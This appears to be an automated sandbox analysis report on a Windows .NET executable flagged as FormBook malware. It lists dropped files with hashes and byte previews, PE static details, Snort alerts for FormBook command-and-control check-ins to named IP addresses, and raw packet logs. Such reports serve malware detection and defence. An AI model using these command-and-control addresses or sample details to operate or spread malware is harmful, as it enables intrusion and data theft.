                                                                            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):15564
                                                                            Entropy (8bit):5.551291320499996
                                                                            Encrypted:false
                                                                            SSDEEP:384:Hte/RG0cEBW971II99bCfyMSjnOilrIR9FvImP4oX+mE:P9719KoOilr09CSlE
                                                                            MD5:E7F1796E8DF5FC62B672DA2F4429B4E4
                                                                            SHA1:D95E6A1652A1D6C86DAE3B9B7F8BF260666442B2
                                                                            SHA-256:05D85276F0B5FD0CCFAD9093B5A7D1E50773B063FD54FBDD7BA4E76893DB79B9
                                                                            SHA-512:D398997AE48EDDDE315F82942F3021904BAFE441516F3A580A059B557FB09D5A38A4D8A179C578132B107110F38E6951EAEABC07A885631670AD55D5312E6419
                                                                            Malicious:false
                                                                            Preview:@...e.......................e.W.h.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                            C:\Users\user\AppData\Local\Temp\M61Ae5o9b

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\systray.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                            Category:dropped
                                                                            Size (bytes):94208
                                                                            Entropy (8bit):1.287139506398081
                                                                            Encrypted:false
                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                            MD5:292F98D765C8712910776C89ADDE2311
                                                                            SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                            SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                            SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dgjipv3a.uw1.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i35hi1li.r2m.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i45pd4er.ypj.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfu4f4st.4n4.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k1fvfy5u.yzh.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qoqqfvf3.zav.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1

                                                                            C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):692224
                                                                            Entropy (8bit):5.868183818609632
                                                                            Encrypted:false
                                                                            SSDEEP:12288:xTyShIKgMyx0SA4sZm4hGFJ4eCPBh+C3:xxhI+zSAdI2GFJ4Xz
                                                                            MD5:F296A60E1568722B060DE70B46357FE6
                                                                            SHA1:E24C65BD02D435C6B5705E9A01442E0447B77E22
                                                                            SHA-256:661F40C3448FA2ACBDDFD8297C54733B9F2D9C71E15506A4FBA876A25D279E76
                                                                            SHA-512:D3B3A695845EF355BCBA27DD6E55DA85EA345F661AD0D10BFF776E0192E21186B780C764D12E293CDEAA819854FA8D1681D585591F34627436B8CCFF97AB6D64
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................J...D......zh... ........@.. ....................................`.................................,h..L.......FA...........................................................................h............... ..H............text....H... ...J.................. ..`.rsrc...FA.......B...L..............@..@.reloc..............................@..B................H.......4m...............................................................0'.........s......(....jo.....(....o.....(....o...........%.....(....o.....(....o.......o....r...po.....o....r...po....s.....(...+%..o......jo.....o.........(.....o.....o......(.....o.....o....(....(.....o.........(.....o....o....(....*.........(....*..{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*J.s....}.....(....*..0..)...........i.Y.8...............

                                                                            C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Entropy (8bit):5.868183818609632
                                                                            TrID:
                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                            File name:SC_0017384.exe
                                                                            File size:692224
                                                                            MD5:f296a60e1568722b060de70b46357fe6
                                                                            SHA1:e24c65bd02d435c6b5705e9a01442e0447b77e22
                                                                            SHA256:661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
                                                                            SHA512:d3b3a695845ef355bcba27dd6e55da85ea345f661ad0d10bff776e0192e21186b780c764d12e293cdeaa819854fa8d1681d585591f34627436b8ccff97ab6d64
                                                                            SSDEEP:12288:xTyShIKgMyx0SA4sZm4hGFJ4eCPBh+C3:xxhI+zSAdI2GFJ4Xz
                                                                            TLSH:BFE429707BF89717C5BF6B72E0B9B25847B4D466A216E78B844D52F10CD2340AC1A3AF
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................J...D......zh... ........@.. ....................................`................................

                                                                            File Icon

                                                                            Icon Hash:185ada32e9cc368b

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x4a687a
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6418E0D7 [Mon Mar 20 22:40:23 2023 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:4
                                                                            OS Version Minor:0
                                                                            File Version Major:4
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:4
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp dword ptr [004A6888h]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            pop esp
                                                                            push 0000000Ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa682c0x4c.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x4146.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xa68880x8.text
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x20000xa48900xa4a00False0.34067126993166286data5.83594677699421IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0xa80000x41460x4200False0.20815577651515152data4.044367816999576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xae0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountry
                                                                            RT_ICON0xa81400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m
                                                                            RT_ICON0xa85b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m
                                                                            RT_ICON0xa96700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m
                                                                            RT_GROUP_ICON0xabc280x30data
                                                                            RT_VERSION0xabc680x2e4data
                                                                            RT_MANIFEST0xabf5c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                                                            Imports

                                                                            DLLImport
                                                                            mscoree.dll_CorExeMain

                                                                            Network Behavior

                                                                            Snort IDS Alerts

                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            192.168.2.5172.67.194.22549710802031453 03/21/23-09:12:13.411086TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5172.67.194.225
                                                                            192.168.2.574.208.236.13149702802031449 03/21/23-09:11:27.575244TCP2031449ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.574.208.236.131
                                                                            192.168.2.574.208.236.13149702802031412 03/21/23-09:11:27.575244TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.574.208.236.131
                                                                            192.168.2.574.208.236.13149702802031453 03/21/23-09:11:27.575244TCP2031453ET TROJAN FormBook CnC Checkin (GET)4970280192.168.2.574.208.236.131
                                                                            192.168.2.5172.67.194.22549710802031449 03/21/23-09:12:13.411086TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5172.67.194.225
                                                                            192.168.2.5172.67.194.22549710802031412 03/21/23-09:12:13.411086TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5172.67.194.225

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 21, 2023 09:10:10.204607964 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.204669952 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.204794884 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.244721889 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.244771004 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.314131021 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.314223051 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.331425905 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.331454039 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.331841946 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.383747101 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.569000006 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.569056034 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617197990 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617248058 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617260933 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617333889 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617363930 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617372990 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617403030 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617440939 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617489100 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617489100 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617489100 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617495060 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617517948 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617527008 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617542982 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617557049 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617588997 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617589951 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617607117 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.617654085 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.617682934 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.641709089 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.641772985 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.641916037 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.641935110 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.641969919 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.641987085 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642051935 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642110109 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642123938 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642133951 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642165899 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642195940 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642529964 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642575979 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642618895 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642632008 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.642652035 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.642673016 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.667993069 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668103933 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668189049 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668215036 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668237925 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668272018 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668406010 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668510914 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668545961 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668556929 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668587923 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668603897 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668737888 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668801069 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668867111 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668884993 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.668903112 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.668940067 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669044018 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669110060 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669153929 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669162989 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669193983 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669217110 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669527054 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669589043 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669621944 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669630051 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669658899 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669677973 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669856071 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669913054 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669943094 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669959068 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.669975042 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.669996977 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695274115 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695343018 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695442915 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695466995 CET44349698188.40.83.211192.168.2.5
                                                                            Mar 21, 2023 09:10:10.695493937 CET49698443192.168.2.5188.40.83.211
                                                                            Mar 21, 2023 09:10:10.695514917 CET49698443192.168.2.5188.40.83.211
